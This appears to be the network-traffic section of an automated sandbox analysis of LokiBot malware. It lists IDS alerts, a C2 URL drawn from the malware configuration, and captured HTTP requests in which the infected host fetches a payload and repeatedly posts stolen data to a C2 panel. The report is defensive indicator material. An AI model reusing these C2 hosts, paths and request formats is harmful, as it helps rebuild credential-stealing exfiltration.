          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49897 -> 192.185.217.246:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor URLs: https://afrocompass.com/karinedocesesalgados_Hpi
          Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox View ASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox View IP Address: 192.185.217.246 192.185.217.246
          Source: global traffic HTTP traffic detected: GET /karinedocesesalgados_HpiSWwhaod1.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: afrocompass.com Cache-Control: no-cache
          Source: global traffic HTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: karinedocesesalgados.com.br Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0D53234 Content-Length: 178 Connection: close
          Source: global traffic HTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: karinedocesesalgados.com.br Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0D53234 Content-Length: 3211 Connection: close
          Source: global traffic HTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: karinedocesesalgados.com.br Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0D53234 Content-Length: 151 Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
